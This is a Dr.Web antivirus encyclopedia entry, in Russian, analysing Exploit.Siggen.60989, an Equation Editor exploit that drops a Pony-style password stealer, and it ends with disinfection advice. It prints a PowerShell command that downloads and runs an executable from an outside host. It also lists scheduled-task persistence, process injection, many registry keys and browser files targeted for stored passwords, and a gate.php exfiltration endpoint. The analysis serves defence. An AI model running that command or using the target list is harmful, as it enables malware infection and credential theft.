Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Exploit.Siggen.60989
Добавлен в вирусную базу Dr.Web:
2020-02-20
Описание добавлено:
2020-02-22
Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
<SYSTEM32>\tasks\updates\cfzzgkuaooxzag
Вредоносные функции
Загружает и запускает на исполнение
http://go##andi.us/pp.exe как $dskq
Запускает на исполнение (эксплоит)
'%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$dSKq=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/pp.exe', $dSKq);(New-Object -com Shell.Application).ShellExecute( $dSKq);}cat...
Внедряет код в
следующие системные процессы:
%WINDIR%\microsoft.net\framework\v4.0.30319\vbc.exe
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
[<HKCU>\Software\Far Manager\Plugins\FTP\Hosts]
[<HKCU>\Software\SimonTatham\PuTTY\Sessions]
[<HKCU>\Software\LinasFTP\Site Manager]
[<HKLM>\SOFTWARE\Wow6432Node\Robo-FTP 3.7\Scripts]
[<HKCU>\SOFTWARE\Robo-FTP 3.7\Scripts]
[<HKLM>\SOFTWARE\Wow6432Node\Robo-FTP 3.7\FTPServers]
[<HKCU>\SOFTWARE\Robo-FTP 3.7\FTPServers]
[<HKCU>\Software\FlashPeak\BlazeFtp\Settings]
[<HKLM>\Software\Wow6432Node\SimonTatham\PuTTY\Sessions]
[<HKLM>\Software\Wow6432Node\South River Technologies\WebDrive\Connections]
[<HKLM>\Software\Wow6432Node\Martin Prikryl]
[<HKCU>\Software\Martin Prikryl]
[<HKLM>\Software\Wow6432Node\SoftX.org\FTPClient\Sites]
[<HKCU>\Software\SoftX.org\FTPClient\Sites]
[<HKLM>\Software\Wow6432Node\FTPClient\Sites]
[<HKCU>\Software\FTPClient\Sites]
[<HKLM>\SOFTWARE\Wow6432Node\NCH Software\Fling\Accounts]
[<HKCU>\Software\South River Technologies\WebDrive\Connections]
[<HKLM>\Software\Wow6432Node\RimArts\B2\Settings]
[<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings]
[<HKCU>\Software\MAS-Soft\FTPInfo\Setup]
[<HKCU>\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts]
[<HKLM>\Software\Wow6432Node\Microsoft\Internet Account Manager]
[<HKCU>\Identities\{91255D00-95D9-49F5-8E84-7C027F5283B7}\Software\Microsoft\Internet Account Manager\Accounts]
[<HKCU>\Software\Microsoft\Internet Account Manager\Accounts]
[<HKLM>\Software\Wow6432Node\RIT\The Bat!\Users depot]
[<HKLM>\Software\Wow6432Node\RIT\The Bat!]
[<HKCU>\Software\RIT\The Bat!\Users depot]
[<HKCU>\SOFTWARE\NCH Software\Fling\Accounts]
[<HKCU>\Software\RIT\The Bat!]
[<HKCU>\Software\RimArts\B2\Settings]
[<HKCU>\Software\Microsoft\Windows Mail]
[<HKCU>\Software\Microsoft\Windows Live Mail]
[<HKLM>\Software\Wow6432Node\Nico Mak Computing\WinZip\mru\jobs]
[<HKCU>\Software\Nico Mak Computing\WinZip\mru\jobs]
[<HKLM>\Software\Wow6432Node\Nico Mak Computing\WinZip\FTP]
[<HKCU>\Software\Nico Mak Computing\WinZip\FTP]
[<HKCU>\Software\CoffeeCup Software]
[<HKLM>\Software\Wow6432Node\CoffeeCup Software]
[<HKCU>\Software\NCH Software\ClassicFTP\FTPAccounts]
[<HKCU>\Software\FileZilla Client]
[<HKLM>\Software\Wow6432Node\FlashFXP\3]
[<HKCU>\Software\FlashFXP]
[<HKCU>\Software\FlashFXP\3]
[<HKCU>\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar]
[<HKCU>\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar]
[<HKCU>\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar]
[<HKCU>\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar]
[<HKLM>\Software\Wow6432Node\FlashFXP]
[<HKCU>\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar]
[<HKLM>\Software\Wow6432Node\Ghisler\Total Commander]
[<HKCU>\Software\Ghisler\Total Commander]
[<HKLM>\Software\Wow6432Node\Ghisler\Windows Commander]
[<HKCU>\Software\Ghisler\Windows Commander]
[<HKCU>\Software\Far Manager\SavedDialogHistory\FTPHost]
[<HKCU>\Software\Far2\SavedDialogHistory\FTPHost]
[<HKCU>\Software\Far\SavedDialogHistory\FTPHost]
[<HKCU>\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar]
[<HKLM>\Software\Wow6432Node\TurboFTP]
[<HKCU>\Software\ExpanDrive\Sessions]
[<HKLM>\Software\Wow6432Node\FileZilla]
[<HKCU>\Software\Cryer\WebSitePublisher]
[<HKCU>\Software\VanDyke\SecureFX]
[<HKCU>\Software\FTP Explorer\Profiles]
[<HKCU>\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224]
[<HKCU>\Software\FTPWare\COREFTP\Sites]
[<HKCU>\Software\CoffeeCup Software\Internet\Profiles]
[<HKCU>\Software\Sota\FFFTP\Options]
[<HKLM>\Software\Wow6432Node\NCH Software\ClassicFTP\FTPAccounts]
[<HKCU>\Software\Sota\FFFTP]
[<HKCU>\Software\TurboFTP]
[<HKCU>\Software\BPFTP]
[<HKCU>\Software\BulletProof Software\BulletProof FTP Client\Options]
[<HKCU>\Software\BPFTP\Bullet Proof FTP\Options]
[<HKCU>\Software\BulletProof Software\BulletProof FTP Client\Main]
[<HKCU>\Software\BPFTP\Bullet Proof FTP\Main]
[<HKLM>\Software\Wow6432Node\FileZilla Client]
[<HKCU>\Software\FileZilla]
[<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]
Читает файлы, отвечающие за хранение паролей сторонними программами
%APPDATA%\mozilla\firefox\profiles.ini
%LOCALAPPDATA%\google\chrome\user data\default\web data
%LOCALAPPDATA%\google\chrome\user data\default\login data
%APPDATA%\thunderbird\profiles.ini
Перебирает пароли аккаунтов ОС.
Изменения в файловой системе
Создает следующие файлы
%TEMP%\name.exe
%APPDATA%\cfzzgkuaooxzag.exe
%TEMP%\tmp6a21.tmp
%TEMP%\1152125.bat
Присваивает атрибут 'скрытый' для следующих файлов
%APPDATA%\cfzzgkuaooxzag.exe
Удаляет следующие файлы
%TEMP%\tmp6a21.tmp
%WINDIR%\microsoft.net\framework\v4.0.30319\vbc.exe
Сетевая активность
TCP
Запросы HTTP GET
http://go##andi.us/pp.exe
http://ad####urniture.com/panel/panel/pony.exe
Запросы HTTP POST
http://ad####urniture.com/panel/panel/gate.php
UDP
DNS ASK go##andi.us
DNS ASK ad####urniture.com
Другое
Создает и запускает на исполнение
'%TEMP%\name.exe'
'%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$dSKq=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/pp.exe', $dSKq);(New-Object -com Shell.Application).ShellExecute( $dSKq);}cat...' (со скрытым окном)
'%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\cFzZgkUaooXzAg" /XML "%TEMP%\tmp6A21.tmp"' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\1152125.bat" "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\vbc.exe" "' (со скрытым окном)
Запускает на исполнение
'%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
'%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\cFzZgkUaooXzAg" /XML "%TEMP%\tmp6A21.tmp"
'%WINDIR%\microsoft.net\framework\v4.0.30319\vbc.exe'
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\1152125.bat" "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\vbc.exe" "
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK